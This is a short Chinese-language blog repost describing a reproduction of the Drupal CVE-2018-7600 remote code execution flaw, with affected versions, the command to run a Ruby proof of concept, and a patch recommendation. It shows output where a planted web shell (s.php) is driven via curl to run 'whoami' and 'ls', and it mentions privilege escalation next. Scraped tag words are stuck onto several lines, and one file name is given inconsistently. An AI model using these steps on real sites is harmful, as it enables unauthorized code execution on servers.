drupal CVE-2018-7600 復現

時間  2020-11-30
標籤 php linux shell ruby curl url spa code blog get 欄目 PHP 简体版
原文   原文鏈接

1.系統環境

  • Drupal 8.5
  • linux 主機
  • ruby 代碼

2.原理說明

影響版本php

Drupal 6.x,7.x,8.xlinux

參考:CVE-2018-7600漏洞分析shell

 

3.利用

 在Python2.7 環境下運行poc便可驗證ruby

或者在Linux下安裝ruby環境 而且運行 CVE-2018-7600.rb文件 curl

ruby CVE-2017-7600.rb 
ruby CVE-2018-7600.rb http://127.0.0.1:8089/drupal-8.5.0/ [*] Fake shell:   curl 'http://47.98.122.11:8089/drupal-8.5.0/s.php' -d 'c=whoami'
[*] Fake shell:   curl 'http://47.98.122.11:8089/drupal-8.5.0/s.php' -d 'c=ls'

最後能夠查找系統漏洞進行提權url

4.修復

主要支持版本推薦更新到Drupal相應的最新子版本spa

 參考 drupal官網code

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程